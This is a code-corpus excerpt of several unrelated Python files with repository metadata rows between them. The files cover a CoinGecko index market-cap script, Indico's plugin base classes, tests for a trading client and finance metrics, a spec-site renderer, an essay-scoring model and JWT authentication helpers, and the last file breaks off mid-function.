# 2. prepare index compositions info as a csv file which contain the info about when a coin is added
# or removed from the index and its id in coingecko. e.g. dpi_index.csv, mvi_index.csv.
# maintenance: each time a coin is added or removed from a index the csv file must change accordingly.
# result is saved as a csv file which contains the index market capture by day.
from pycoingecko import CoinGeckoAPI
import pandas as pd
import numpy as np
import time
import datetime
today = datetime.datetime.now().strftime("%Y-%m-%d")
# connect coingecko api
cg = CoinGeckoAPI()
def time_to_unix(str_time):
"""
convert str time tp unix timestamp
:param str_time: yyyy-mm-dd
:return: timestamp
"""
return time.mktime(time.strptime(str_time, "%Y-%m-%d"))
def get_index_compositions_market_cap(compositions_table):
"""
get index compositions market cap by day
:param compositions_table: dataframe which contains index composition info
:return: dataframe which is index compositions marketcap by day
"""
coins_cap = pd.DataFrame(columns=['dates','coinscap','coins'])
count = 0
for coin in compositions_table.values:
coin_id = coin[4]
from_timestamp = time_to_unix(coin[2])
if coin[2] == coin[3]:
to_timestamp = time_to_unix(today)
else:
to_timestamp = time_to_unix(coin[3])
datas = cg.get_coin_market_chart_range_by_id(id=coin_id,vs_currency='usd',from_timestamp=from_timestamp,to_timestamp=to_timestamp)
datas_df = pd.DataFrame(datas['market_caps'],columns=['dates','coinscap'])
datas_df['coins'] = coin[1]
coins_cap=coins_cap.append(datas_df)
time.sleep(5)
count += 1
print('round %d ,get market cap of %s'%(count,coin_id))
coins_cap['days'] = pd.to_datetime(coins_cap['dates'], unit='ms').dt.date
coins_cap = coins_cap.groupby(['coins', 'days']).nth(0).reset_index()
coins_cap = coins_cap.groupby('days')['coinscap'].sum().reset_index()
return coins_cap
def get_index_market_cap(id,from_time):
"""
get index marketcap
:param id: coingekco id
:param from_time: index start time yyyy-mm-dd
:return: dataframe which contains days and marketcap
"""
from_timestamp = time_to_unix(from_time)
to_timestamp = time_to_unix(today)
index_caps = cg.get_coin_market_chart_range_by_id(id=id, vs_currency='usd',
from_timestamp=from_timestamp, to_timestamp=to_timestamp)
index_df = pd.DataFrame(index_caps['market_caps'], columns=['dates', 'index_marketcap'])
index_df['days'] = pd.to_datetime(index_df['dates'], unit='ms').dt.date
index_df = index_df.drop(columns='dates')
index_df = index_df.groupby('days').nth(0).reset_index()
return index_df
def get_index_market_capture(index_info_dir,id,from_time):
"""
get index market capture
:param index_info_dir: dir of index info table
:param id: coingecko id of index
:param from_time: index start time yyyy-mm-dd
:return: dataframe, compositions and index market cap by day
"""
# read dpi composition info
index_table = pd.read_csv(index_info_dir)
coins_cap = get_index_compositions_market_cap(index_table)
index_cap = get_index_market_cap(id,from_time)
market_capture = index_cap.merge(coins_cap, on='days', how='left')
market_capture['market_capture'] = market_capture['index_marketcap'] / market_capture['coinscap']*100
return market_capture.round(3)
if __name__ == '__main__':
# dpi market capture
dpi_market_capture = get_index_market_capture(index_info_dir='./dpi_index.csv',id='defipulse-index',from_time='2020-09-10')
# save result as dpi_market_capture.csv
dpi_market_capture.to_csv('./dpi_market_capture.csv',columns = ['days','index_marketcap','coinscap','market_capture'],index=False)
# mvi market capture
mvi_market_capture = get_index_market_capture(index_info_dir='./mvi_index.csv',id='metaverse-index',from_time='2021-04-06')
# save result as mvi_market_capture.csv
mvi_market_capture.to_csv('./mvi_market_capture.csv',columns = ['days','index_marketcap','coinscap','market_capture'],index=False)
| 41.236364
| 138
| 0.710317
|
604399ec058c935b0fa2b15ddcc7929f53b87969
| 53
|
py
|
Python
|
gempy/__init__.py
|
DBerke/DRAGONS
|
cecf9a03970af95126bd17a227bd5214a5d6c64b
|
[
"BSD-3-Clause"
] | 19
|
2017-10-23T14:52:51.000Z
|
2022-03-28T04:49:00.000Z
|
gempy/__init__.py
|
DBerke/DRAGONS
|
cecf9a03970af95126bd17a227bd5214a5d6c64b
|
[
"BSD-3-Clause"
] | 194
|
2017-11-01T17:32:45.000Z
|
2022-03-31T21:32:59.000Z
|
gempy/__init__.py
|
DBerke/DRAGONS
|
cecf9a03970af95126bd17a227bd5214a5d6c64b
|
[
"BSD-3-Clause"
] | 16
|
2017-11-01T05:18:04.000Z
|
2021-12-14T23:08:57.000Z
|
from astrodata import version
__version__ = version()
| 26.5
| 29
| 0.830189
|
d9dd312f4105999d1bfc7f48b5c0b7f0d429a6f9
| 1,284
|
py
|
Python
|
tests/test_market.py
|
masakichi/otcbtc-client
|
28f8ee57b4321e901463c913c5fd892ecb0cee7b
|
[
"MIT"
] | 6
|
2018-05-20T13:51:41.000Z
|
2019-08-01T10:44:22.000Z
|
tests/test_market.py
|
masakichi/otcbtc-client
|
28f8ee57b4321e901463c913c5fd892ecb0cee7b
|
[
"MIT"
] | null | null | null |
tests/test_market.py
|
masakichi/otcbtc-client
|
28f8ee57b4321e901463c913c5fd892ecb0cee7b
|
[
"MIT"
] | 2
|
2018-12-03T01:12:17.000Z
|
2019-02-20T04:52:20.000Z
|
# coding: utf-8
import responses
from otcbtc_client.client import OTCBTCClient
class TestMarket(object):
@property
def market(self):
return OTCBTCClient().market
@responses.activate
def test_all(self):
market = self.market
responses.add(
responses.GET,
market.build_url(market.URI),
json=[
{
'id': 'otbeth', # Unique marked id.
'ticker_id': 'btc_eth', # Unique ticker id.
'name': 'BTC/ETH' # market name
},
{
'id': 'otbeth',
'ticker_id': 'otb_eth',
'name': 'OTB/ETH'
},
{
'id': 'eoseth',
'ticker_id': 'eos_eth',
'name': 'EOS/ETH'
},
{
'id': 'bcheth',
'ticker_id': 'bch_eth',
'name': 'BCH/ETH'
},
],
match_querystring=True)
resp = market.all()
assert resp[0]
assert resp[0]['id'] == 'otbeth'
assert resp[0]['ticker_id'] == 'btc_eth'
assert resp[0]['name'] == 'BTC/ETH'
| 27.319149
| 64
| 0.403427
|
74fe6e0d5b67ca356c7437271329a3aa10889a2e
| 13,858
|
py
|
Python
|
indico/core/plugins/__init__.py
|
uxmaster/indico
|
ecd19f17ef6fdc9f5584f59c87ec647319ce5d31
|
[
"MIT"
] | 1
|
2019-11-03T11:34:16.000Z
|
2019-11-03T11:34:16.000Z
|
indico/core/plugins/__init__.py
|
NP-compete/indico
|
80db7ca0ef9d1f3240a16b9ff2d84bf0bf26c549
|
[
"MIT"
] | null | null | null |
indico/core/plugins/__init__.py
|
NP-compete/indico
|
80db7ca0ef9d1f3240a16b9ff2d84bf0bf26c549
|
[
"MIT"
] | null | null | null |
# This file is part of Indico.
# Copyright (C) 2002 - 2019 CERN
#
# Indico is free software; you can redistribute it and/or
# modify it under the terms of the MIT License; see the
# LICENSE file for more details.
from __future__ import unicode_literals
import errno
import json
import os
from flask import g, session
from flask_babelex import Domain
from flask_pluginengine import (Plugin, PluginBlueprintMixin, PluginBlueprintSetupStateMixin, PluginEngine,
current_plugin, render_plugin_template, wrap_in_plugin_context)
from werkzeug.utils import cached_property
from indico.core import signals
from indico.core.db import db
from indico.core.db.sqlalchemy.util.models import import_all_models
from indico.core.logger import Logger
from indico.core.settings import SettingsProxy
from indico.core.webpack import IndicoManifestLoader
from indico.modules.events.settings import EventSettingsProxy
from indico.modules.events.static.util import RewrittenManifest
from indico.modules.users import UserSettingsProxy
from indico.util.decorators import cached_classproperty, classproperty
from indico.util.i18n import NullDomain, _
from indico.util.struct.enum import IndicoEnum
from indico.web.flask.templating import get_template_module, register_template_hook
from indico.web.flask.util import url_for, url_rule_to_js
from indico.web.flask.wrappers import IndicoBlueprint, IndicoBlueprintSetupState
from indico.web.menu import SideMenuItem
from indico.web.views import WPJinjaMixin
class PluginCategory(unicode, IndicoEnum):
search = _('Search')
synchronization = _('Synchronization')
payment = _('Payment')
importers = _('Importers')
videoconference = _('Videoconference')
other = _('Other')
class IndicoPlugin(Plugin):
"""Base class for an Indico plugin
All your plugins need to inherit from this class. It extends the
`Plugin` class from Flask-PluginEngine with useful indico-specific
functionality that makes it easier to write custom plugins.
When creating your plugin, the class-level docstring is used to
generate the friendly name and description of a plugin. Its first
line becomes the name while everything else goes into the description.
This class provides methods for some of the more common hooks Indico
provides. Additional signals are defined in :mod:`~indico.core.signals`
and can be connected to custom functions using :meth:`connect`.
"""
#: WTForm for the plugin's settings (requires `configurable=True`).
#: All fields must return JSON-serializable types.
settings_form = None
#: A dictionary which can contain the kwargs for a specific field in the `settings_form`.
settings_form_field_opts = {}
#: A dictionary containing default values for settings
default_settings = {}
#: A dictionary containing default values for event-specific settings
default_event_settings = {}
#: A dictionary containing default values for user-specific settings
default_user_settings = {}
#: A set containing the names of settings which store ACLs
acl_settings = frozenset()
#: A set containing the names of event-specific settings which store ACLs
acl_event_settings = frozenset()
#: A dict containing custom converters for settings
settings_converters = {}
#: A dict containing custom converters for event-specific settings
event_settings_converters = {}
#: A dict containing custom converters for user-specific settings
user_settings_converters = {}
#: If the plugin should link to a details/config page in the admin interface
configurable = False
#: The group category that the plugin belongs to
category = None
#: If `settings`, `event_settings` and `user_settings` should use strict
#: mode, i.e. only allow keys in `default_settings`, `default_event_settings`
#: or `default_user_settings` (or the related `acl_settings` sets).
#: This should not be disabled in most cases; if you need to store arbitrary
#: keys, consider storing a dict inside a single top-level setting.
strict_settings = True
def init(self):
"""Called when the plugin is being loaded/initialized.
If you want to run custom initialization code, this is the
method to override. Make sure to call the base method or
the other overridable methods in this class will not be
called anymore.
"""
assert self.configurable or not self.settings_form, 'Non-configurable plugin cannot have a settings form'
self.alembic_versions_path = os.path.join(self.root_path, 'migrations')
self.connect(signals.plugin.get_blueprints, lambda app: self.get_blueprints())
self.template_hook('vars-js', self.inject_vars_js)
self._import_models()
def _import_models(self):
old_models = set(db.Model._decl_class_registry.items())
import_all_models(self.package_name)
added_models = set(db.Model._decl_class_registry.items()) - old_models
# Ensure that only plugin schemas have been touched. It would be nice if we could actually
# restrict a plugin to plugin_PLUGNNAME but since we load all models from the plugin's package
# which could contain more than one plugin this is not easily possible.
for name, model in added_models:
schema = model.__table__.schema
if not schema.startswith('plugin_'):
raise Exception("Plugin '{}' added a model which is not in a plugin schema ('{}' in '{}')"
.format(self.name, name, schema))
def connect(self, signal, receiver, **connect_kwargs):
connect_kwargs['weak'] = False
func = wrap_in_plugin_context(self, receiver)
func.indico_plugin = self
signal.connect(func, **connect_kwargs)
def get_blueprints(self):
"""Return blueprints to be registered on the application
A single blueprint can be returned directly, for multiple blueprint you need
to yield them or return an iterable.
"""
pass
def get_vars_js(self):
"""Return a dictionary with variables to be added to vars.js file"""
return None
@cached_property
def translation_path(self):
"""
Return translation files to be used by the plugin.
By default, get <root_path>/translations, unless it does not exist
"""
translations_path = os.path.join(self.root_path, 'translations')
return translations_path if os.path.exists(translations_path) else None
@cached_property
def translation_domain(self):
"""Return the domain for this plugin's translation_path"""
path = self.translation_path
return Domain(path) if path else NullDomain()
def _get_manifest(self):
try:
loader = IndicoManifestLoader(custom=False)
return loader.load(os.path.join(self.root_path, 'static', 'dist', 'manifest.json'))
except IOError as exc:
if exc.errno != errno.ENOENT:
raise
return None
@property
def manifest(self):
if g.get('static_site') and 'custom_manifests' in g:
try:
return g.custom_manifests[self.name]
except KeyError:
manifest = self._get_manifest()
g.custom_manifests[self.name] = RewrittenManifest(manifest) if manifest else None
return g.custom_manifests[self.name]
return self._get_manifest()
def inject_bundle(self, name, view_class=None, subclasses=True, condition=None):
"""Injects an asset bundle into Indico's pages
:param name: Name of the bundle
:param view_class: If a WP class is specified, only inject it into pages using that class
:param subclasses: also inject into subclasses of `view_class`
:param condition: a callable to determine whether to inject or not. only called, when the
view_class criterion matches
"""
def _do_inject(sender):
if condition is None or condition():
return self.manifest[name]
if view_class is None:
self.connect(signals.plugin.inject_bundle, _do_inject)
elif not subclasses:
self.connect(signals.plugin.inject_bundle, _do_inject, sender=view_class)
else:
def _func(sender):
if issubclass(sender, view_class):
return _do_inject(sender)
self.connect(signals.plugin.inject_bundle, _func)
def inject_vars_js(self):
"""Returns a string that will define variables for the plugin in the vars.js file"""
vars_js = self.get_vars_js()
if vars_js:
return 'var {}Plugin = {};'.format(self.name.title(), json.dumps(vars_js))
def template_hook(self, name, receiver, priority=50, markup=True):
"""Registers a function to be called when a template hook is invoked.
For details see :func:`~indico.web.flask.templating.register_template_hook`
"""
register_template_hook(name, receiver, priority, markup, self)
@classproperty
@classmethod
def logger(cls):
return Logger.get('plugin.{}'.format(cls.name))
@cached_classproperty
@classmethod
def settings(cls):
""":class:`SettingsProxy` for the plugin's settings"""
if cls.name is None:
raise RuntimeError('Plugin has not been loaded yet')
instance = cls.instance
with instance.plugin_context(): # in case the default settings come from a property
return SettingsProxy('plugin_{}'.format(cls.name), instance.default_settings, cls.strict_settings,
acls=cls.acl_settings, converters=cls.settings_converters)
@cached_classproperty
@classmethod
def event_settings(cls):
""":class:`EventSettingsProxy` for the plugin's event-specific settings"""
if cls.name is None:
raise RuntimeError('Plugin has not been loaded yet')
instance = cls.instance
with instance.plugin_context(): # in case the default settings come from a property
return EventSettingsProxy('plugin_{}'.format(cls.name), instance.default_event_settings,
cls.strict_settings, acls=cls.acl_event_settings,
converters=cls.event_settings_converters)
@cached_classproperty
@classmethod
def user_settings(cls):
""":class:`UserSettingsProxy` for the plugin's user-specific settings"""
if cls.name is None:
raise RuntimeError('Plugin has not been loaded yet')
instance = cls.instance
with instance.plugin_context(): # in case the default settings come from a property
return UserSettingsProxy('plugin_{}'.format(cls.name), instance.default_user_settings,
cls.strict_settings, converters=cls.user_settings_converters)
def plugin_url_rule_to_js(endpoint):
"""Like :func:`~indico.web.flask.util.url_rule_to_js` but prepending plugin name prefix to the endpoint"""
if '.' in endpoint[1:]: # 'foo' or '.foo' should not get the prefix
endpoint = 'plugin_{}'.format(endpoint)
return url_rule_to_js(endpoint)
def url_for_plugin(endpoint, *targets, **values):
"""Like :func:`~indico.web.flask.util.url_for` but prepending ``'plugin_'`` to the blueprint name."""
if '.' in endpoint[1:]: # 'foo' or '.foo' should not get the prefix
endpoint = 'plugin_{}'.format(endpoint)
return url_for(endpoint, *targets, **values)
def get_plugin_template_module(template_name, **context):
"""Like :func:`~indico.web.flask.templating.get_template_module`, but using plugin templates"""
template_name = '{}:{}'.format(current_plugin.name, template_name)
return get_template_module(template_name, **context)
class IndicoPluginEngine(PluginEngine):
plugin_class = IndicoPlugin
class IndicoPluginBlueprintSetupState(PluginBlueprintSetupStateMixin, IndicoBlueprintSetupState):
def add_url_rule(self, rule, endpoint=None, view_func=None, **options):
if rule.startswith('/static'):
with self._unprefixed():
super(IndicoPluginBlueprintSetupState, self).add_url_rule(rule, endpoint, view_func, **options)
else:
super(IndicoPluginBlueprintSetupState, self).add_url_rule(rule, endpoint, view_func, **options)
class IndicoPluginBlueprint(PluginBlueprintMixin, IndicoBlueprint):
"""The Blueprint class all plugins need to use.
It contains the necessary logic to run the blueprint's view
functions inside the correct plugin context and to make the
static folder work.
"""
def make_setup_state(self, app, options, first_registration=False):
return IndicoPluginBlueprintSetupState(self, app, options, first_registration)
class WPJinjaMixinPlugin(WPJinjaMixin):
render_template_func = staticmethod(render_plugin_template)
# This is the same value as in WPJinjaMixin but NOT redundant:
# A plugin may have a WP inheriting from `WPJinjaMixinPlugin, WPSomethingElse`
# to get the render_template_func from here while `WPSomethingElse`
# already sets a template prefix and also inherits from WPJinjaMixin,
# in which case the WPJinjaMixin from here would be skipped due to how
# Python's MRO works and thus the template prefix would not be cleared.
template_prefix = ''
@signals.menu.items.connect_via('admin-sidemenu')
def _extend_admin_menu(sender, **kwargs):
if session.user.is_admin:
return SideMenuItem('plugins', _('Plugins'), url_for('plugins.index'), 80, icon='puzzle')
plugin_engine = IndicoPluginEngine()
| 43.716088
| 113
| 0.697864
|
bfbe59f9fe21f776c42909a8ac5263b16ccfe7da
| 6,615
|
py
|
Python
|
bin/render.py
|
anthonyrandell-madetech/specification
|
c675576c5cd2103b52938a6cd8cad546da3433e1
|
[
"MIT"
] | null | null | null |
bin/render.py
|
anthonyrandell-madetech/specification
|
c675576c5cd2103b52938a6cd8cad546da3433e1
|
[
"MIT"
] | 6
|
2020-07-14T07:55:38.000Z
|
2022-01-11T09:50:59.000Z
|
bin/render.py
|
anthonyrandell-madetech/specification
|
c675576c5cd2103b52938a6cd8cad546da3433e1
|
[
"MIT"
] | 2
|
2022-01-06T14:29:05.000Z
|
2022-01-07T09:52:52.000Z
|
#!/usr/bin/env python3
import os
import csv
import jinja2
import markdown
from digital_land_frontend.jinja import setup_jinja
docs = "docs/"
staticPath = "https://digital-land.github.io"
assetPath = "https://digital-land.github.io"
keys = {
"dataset-field": ["dataset", "field"],
"datapackage-dataset": ["datapackage", "dataset"],
}
tables = {
"datapackage": {},
"datapackage-dataset": {},
"datatype": {},
"field": {},
"typology": {},
"dataset": {},
"dataset-field": {},
}
def render(path, template, docs="docs", **kwargs):
path = os.path.join(docs, path)
directory = os.path.dirname(path)
if not os.path.exists(directory):
os.makedirs(directory)
with open(path, "w") as f:
print(f"creating {path}")
f.write(template.render(**kwargs))
def load(table):
for row in csv.DictReader(open("specification/%s.csv" % (table), newline="")):
if table not in keys:
key = table
tables[table][row[key]] = row
else:
pkey, skey = keys[table]
tables[table].setdefault(row[pkey], {})
tables[table][row[pkey]][row[skey]] = row
def field_typology(f):
if f["parent-field"] == "" or f["field"] == f["parent-field"]:
return f["parent-field"]
return field_typology(tables["field"][f["parent-field"]])
def index_typologies():
tables["typology-datatype"] = {}
tables["typology-field"] = {}
tables["typology-dataset"] = {}
for field, f in tables["field"].items():
typology = field_typology(f)
tables["field"][field]["typology"] = typology
tables["typology-field"].setdefault(typology, [])
tables["typology-field"][typology].append(field)
datatype = f["datatype"]
tables["typology-datatype"].setdefault(typology, [])
if datatype not in tables["typology-datatype"][typology]:
tables["typology-datatype"][typology].append(datatype)
if field in tables["dataset"]:
tables["typology-dataset"].setdefault(typology, [])
tables["typology-dataset"][typology].append(field)
def index_datatype():
tables["datatype-field"] = {}
tables["datatype-dataset"] = {}
for field, f in tables["field"].items():
datatype = f["datatype"]
tables["datatype-field"].setdefault(datatype, [])
tables["datatype-field"][datatype].append(field)
if field in tables["dataset"]:
tables["datatype-dataset"].setdefault(datatype, [])
tables["datatype-dataset"][datatype].append(field)
def base_field(field):
f = tables["field"][field]
if f["cardinality"] == "1":
return field
return f["parent-field"]
def index_dataset():
tables["dataset-datapackage"] = {}
for datapackage, d in tables["datapackage-dataset"].items():
for dataset in d:
tables["dataset-datapackage"].setdefault(dataset, [])
tables["dataset-datapackage"][dataset].append(datapackage)
tables["dataset-to"] = {}
tables["dataset-from"] = {}
for dataset, s in tables["dataset-field"].items():
for name in s:
field = base_field(name)
if field != dataset and field in tables["dataset"]:
tables["dataset-to"].setdefault(dataset, [])
if field not in tables["dataset-to"][dataset]:
tables["dataset-to"][dataset].append(field)
tables["dataset-from"].setdefault(field, [])
if dataset not in tables["dataset-from"][field]:
tables["dataset-from"][field].append(dataset)
def index_field():
tables["field-dataset"] = {}
for dataset, s in tables["dataset-field"].items():
for field in s:
tables["field-dataset"].setdefault(field, [])
tables["field-dataset"][field].append(dataset)
def index_datapackage():
tables["field-datapackage"] = {}
for datapackage, d in tables["datapackage-dataset"].items():
for dataset in d:
for field in tables["dataset-field"][dataset]:
tables["field-datapackage"].setdefault(field, [])
if datapackage not in tables["field-datapackage"][field]:
tables["field-datapackage"][field].append(datapackage)
def default_names():
for dataset, s in tables["dataset"].items():
if not s.get("key-field", ""):
s["key-field"] = dataset
if not s.get("name", ""):
s["name"] = tables["field"][dataset]["name"]
if not s.get("description", "") and dataset in tables["field"]:
s["description"] = tables["field"][dataset]["description"]
def dataset_sort(dataset):
fields = sorted(tables["dataset-field"][dataset])
if dataset in fields:
fields.pop(fields.index(dataset))
fields = [dataset] + fields
# move default register fields to end, order is same as in list
for field in ["entry-date", "start-date", "end-date"]:
fields.append(fields.pop(fields.index(field)))
return fields
if __name__ == "__main__":
env = setup_jinja()
md = markdown.Markdown()
env.filters["markdown"] = lambda text: jinja2.Markup(
md.convert(text)
.replace("<p>", '<p class="govuk-body">')
.replace("<ul>", '<ul class="govuk-list govuk-list--bullet">')
)
env.filters["commanum"] = lambda v: "{:,}".format(v)
env.filters["dataset_sort"] = dataset_sort
for table in tables:
load(table)
default_names()
index_typologies()
index_datatype()
index_field()
index_dataset()
index_datapackage()
for template in ["datapackage", "dataset", "field", "datatype", "typology"]:
for name, item in tables[template].items():
render(
"%s/%s/index.html" % (template, name),
env.get_template(template + ".html"),
name=name,
item=item,
tables=tables,
staticPath=staticPath,
assetPath=assetPath,
)
for path, template in [
("index.html", "specifications.html"),
("datapackage/index.html", "datapackages.html"),
("dataset/index.html", "datasets.html"),
("field/index.html", "fields.html"),
("datatype/index.html", "datatypes.html"),
("typology/index.html", "typologies.html"),
]:
render(
path,
env.get_template(template),
tables=tables,
staticPath=staticPath,
assetPath=assetPath,
)
| 32.11165
| 82
| 0.584278
|
8751a04a69a9b944cd91ae177b6eb16ab1a43c39
| 1,747
|
py
|
Python
|
venv/Lib/site-packages/pynance/tst/unit/learn/test_metrics.py
|
LeonardoHMS/imobi
|
6b2b97a05df67ea7d493f7b601382f65c6629cc2
|
[
"MIT"
] | 35
|
2015-03-12T04:16:14.000Z
|
2020-12-17T18:10:15.000Z
|
venv/Lib/site-packages/pynance/tst/unit/learn/test_metrics.py
|
LeonardoHMS/imobi
|
6b2b97a05df67ea7d493f7b601382f65c6629cc2
|
[
"MIT"
] | 31
|
2015-03-16T21:31:04.000Z
|
2021-01-26T00:12:34.000Z
|
venv/Lib/site-packages/pynance/tst/unit/learn/test_metrics.py
|
LeonardoHMS/imobi
|
6b2b97a05df67ea7d493f7b601382f65c6629cc2
|
[
"MIT"
] | 18
|
2015-09-30T10:40:26.000Z
|
2021-01-25T21:20:44.000Z
|
"""
Copyright (c) 2016 Marshall Farrier
license http://opensource.org/licenses/MIT
@author: Marshall Farrier
@contact: marshalldfarrier@gmail.com
@since: 2016-02-01
@summary: Unit tests for machine learning metrics
"""
import unittest
import numpy as np
import pynance as pn
class TestMetrics(unittest.TestCase):
def ndarr_almost_eq(self, a, b, msg=None):
if not np.allclose(a, b):
print('ndarrays not equal:')
print(a)
print(b)
raise self.failureException(msg)
def test_mse_vector(self):
actual = np.array([1., 2., 3.])
predicted = np.array([2., 4., 2.])
self.assertAlmostEqual(pn.learn.mse(predicted, actual), 2.)
def test_mse_matrix(self):
self.addTypeEqualityFunc(np.ndarray, self.ndarr_almost_eq)
actual = np.array([
[1., 3.],
[2., 1.],
[3., 2.]])
predicted = np.array([
[2., 1.],
[4., -1.],
[2., 3.]])
self.assertEqual(pn.learn.mse(predicted, actual), np.array([2., 3.]))
def test_stderr_vector(self):
actual = np.array([-1., 0., 1.])
predicted = np.array([1., 2., -1.])
self.assertAlmostEqual(pn.learn.stderr(predicted, actual), 2.)
def test_stderr_matrix(self):
self.addTypeEqualityFunc(np.ndarray, self.ndarr_almost_eq)
actual = np.array([
[1., -1.],
[2., 0.],
[3., 1.]])
predicted = np.array([
[2., 1.],
[1., 2.],
[2., -1.]])
self.assertEqual(pn.learn.stderr(predicted, actual), np.array([1., 2.]))
if __name__ == '__main__':
unittest.main()
| 28.177419
| 80
| 0.534058
|
05daac84fa0a7c997bdef100f9e789fb8347a524
| 620
|
py
|
Python
|
euphro_auth/jwt/api_views.py
|
betagouv/euphrosyne
|
a67857a8716b5060cd9a2c6fa5f3d45c3fff435a
|
[
"MIT"
] | 1
|
2022-02-21T19:46:20.000Z
|
2022-02-21T19:46:20.000Z
|
euphro_auth/jwt/api_views.py
|
betagouv/euphrosyne
|
a67857a8716b5060cd9a2c6fa5f3d45c3fff435a
|
[
"MIT"
] | 37
|
2021-10-18T18:33:26.000Z
|
2022-03-31T12:38:38.000Z
|
euphro_auth/jwt/api_views.py
|
betagouv/euphrosyne
|
a67857a8716b5060cd9a2c6fa5f3d45c3fff435a
|
[
"MIT"
] | 2
|
2022-03-03T15:41:30.000Z
|
2022-03-07T14:20:26.000Z
|
from rest_framework.authentication import SessionAuthentication
from rest_framework.permissions import IsAdminUser
from rest_framework_simplejwt.views import TokenViewBase
from .serializers import SessionTokenObtainSerializer
class SessionTokenObtainPairView(TokenViewBase):
"""
Takes an authenticated request and returns an access and refresh JSON web
token pair to prove the authentication of those credentials.
"""
authentication_classes = [SessionAuthentication]
permission_classes = [IsAdminUser] # permission to user with `is_staff`
serializer_class = SessionTokenObtainSerializer
| 36.470588
| 77
| 0.817742
|
bfd3be362b6c824c577cc210732f35c096dc8dac
| 5,314
|
py
|
Python
|
all_features_benchmark.py
|
RDulepet19/AES
|
c7d1eef3537313d18ef36c0ba232f8270f60faf1
|
[
"MIT"
] | 1
|
2018-02-07T15:01:19.000Z
|
2018-02-07T15:01:19.000Z
|
all_features_benchmark.py
|
RDulepet19/AES
|
c7d1eef3537313d18ef36c0ba232f8270f60faf1
|
[
"MIT"
] | null | null | null |
all_features_benchmark.py
|
RDulepet19/AES
|
c7d1eef3537313d18ef36c0ba232f8270f60faf1
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python2.7
import re
from sklearn.ensemble import RandomForestRegressor
import pandas as pd
import numpy as np
from sklearn.model_selection import train_test_split
import pickle
# from imp import reload
# import sys
# reload(sys)
# sys.setdefaultencoding('utf8')
global_one_essay_set_train = None
global_features_one_essay_set_train = None
global_rf = None
def selectKImportance(model, X, k=5):
return X[:,model.feature_importances_.argsort()[::-1][:k]]
def extract_features(essays, feature_functions):
return [[f(es) for f in feature_functions] for es in essays]
def main():
global global_one_essay_set_train
global global_features_one_essay_set_train
global global_rf
print("Reading Dataset")
# normalized_data_set = pd.DataFrame(pd.read_table('../data/normalized_data_set.tsv', encoding = 'ISO-8859-1'))
watson_readability_spelling_entities_features_dataset = pd.read_excel('./watson_readability_spelling_entities_features_data_set.xlsx')
basic_stats_features_dataset = pd.read_excel('./essay_basic_stats_features_data_set.xlsx')
merged_features_dataset = pd.merge(basic_stats_features_dataset, watson_readability_spelling_entities_features_dataset, on=['essay_set','essay_id'])
# merged_features_dataset = basic_stats_features_dataset
# randomly shuffle before splitting into training and test set
shuffled_merged_features_dataset = merged_features_dataset.sample(frac=1)
'''
for index, row in shuffled_normalized_data_set.iterrows():
# extract features for each essay
shuffled_normalized_data_set.set_value(index, "character_count", get_character_count(row['essay']))
shuffled_normalized_data_set.set_value(index, "word_count", get_word_count(row['essay']))
# feature_functions = [get_character_count, get_word_count]
'''
train, test = train_test_split(shuffled_merged_features_dataset, test_size = 0.2)
test_result_files = []
essay_set_keys = train.essay_set.unique()
for idx_essay_set in essay_set_keys:
one_essay_set_train = train.loc[train['essay_set'] == idx_essay_set]
one_essay_set_test = test.loc[test['essay_set'] == idx_essay_set]
rf = RandomForestRegressor(n_estimators = 1000, max_features = 50)
exclude_features = ['essay_set', 'essay_id', 'essay', 'score'] #, 'character_count', 'word_count', '5char_count', '6char_count', '7char_count', '8char_count', 'unique_words_count', 'fourth_root_word_count', 'flesch_reading_ease', 'smog_index', 'flesch_kincaid_grade', 'coleman_liau_index', 'automated_readability_index', 'dale_chall_readability_score', 'difficult_words', 'linsear_write_formula', 'gunning_fog']
# rf.fit(features_one_essay_set_train, one_essay_set_train["score"])
features_one_essay_set_train = one_essay_set_train.ix[:, one_essay_set_train.columns.difference(exclude_features)]
rf.fit(features_one_essay_set_train.values, one_essay_set_train["score"])
output_model = open("./model_essay_set_"+str(idx_essay_set)+".mb", 'wb')
pickle.dump(rf, output_model)
output_model.close()
'''
global_one_essay_set_train = one_essay_set_train
global_features_one_essay_set_train = features_one_essay_set_train
global_rf = rf
top_features_one_essay_set_train = selectKImportance(rf, features_one_essay_set_train.values, 50)
'''
# rf_top_features = RandomForestRegressor(n_estimators = 100)
# rf_top_features.fit(top_features_one_essay_set_train, one_essay_set_train["score"])
# print("===IMPORTANT FEATURES====\n\t",rf.feature_importances_)
# print("Features sorted by their score:")
# print(sorted(zip(map(lambda x: round(x, 4), rf.feature_importances_), list(global_one_essay_set_train.columns)[4:],reverse=True)))
# predicted_scores = rf.predict(features_one_essay_set_test)
predicted_scores = rf.predict(one_essay_set_test.ix[:, one_essay_set_test.columns.difference(exclude_features)])
one_essay_set_test['predicted_score'] = predicted_scores
one_essay_set_test['predicted_score'] = one_essay_set_test['predicted_score'].round()
one_essay_set_test['expected_score'] = one_essay_set_test['score'].round()
# one_essay_set_test.to_csv("test_results_"+str(idx_essay_set)+".tsv", sep='\t', encoding='ISO-8859-1', columns=['essay_set', 'essay_id', 'score', 'expected_score', 'predicted_score'])
writer = pd.ExcelWriter("./test_results_"+str(idx_essay_set)+".xlsx")
one_essay_set_test.to_excel(writer, sheet_name="results", index=False, columns=['essay_set', 'essay_id', 'score', 'expected_score', 'predicted_score'])
writer.save()
test_result_files.append("./test_results_"+str(idx_essay_set)+".xlsx")
# combine all test result files into a single file
combined_test_results_df = pd.DataFrame()
for a_file in test_result_files:
a_test_result_df = pd.read_excel(a_file)
combined_test_results_df = pd.concat([combined_test_results_df, a_test_result_df])
# write combined file to output
combined_test_results_df.to_csv("./combined_test_results.tsv", sep='\t', encoding='ISO-8859-1', index=False)
if __name__=="__main__":
main()
| 50.609524
| 419
| 0.740685
|
8607f00fb486ce9751025ee778aae3a589864138
| 570
|
py
|
Python
|
app/api/v1/utilities/auth.py
|
kathy254/Store-Manager-API
|
ef83a71113f28febe7d410f30a9a48e147645c46
|
[
"MIT"
] | null | null | null |
app/api/v1/utilities/auth.py
|
kathy254/Store-Manager-API
|
ef83a71113f28febe7d410f30a9a48e147645c46
|
[
"MIT"
] | null | null | null |
app/api/v1/utilities/auth.py
|
kathy254/Store-Manager-API
|
ef83a71113f28febe7d410f30a9a48e147645c46
|
[
"MIT"
] | null | null | null |
import jwt
from flask import request
from functools import wraps
from instance.config import secret_key
def get_token(f):
@wraps(f)
def decorated(*arg, **kwargs):
token = None
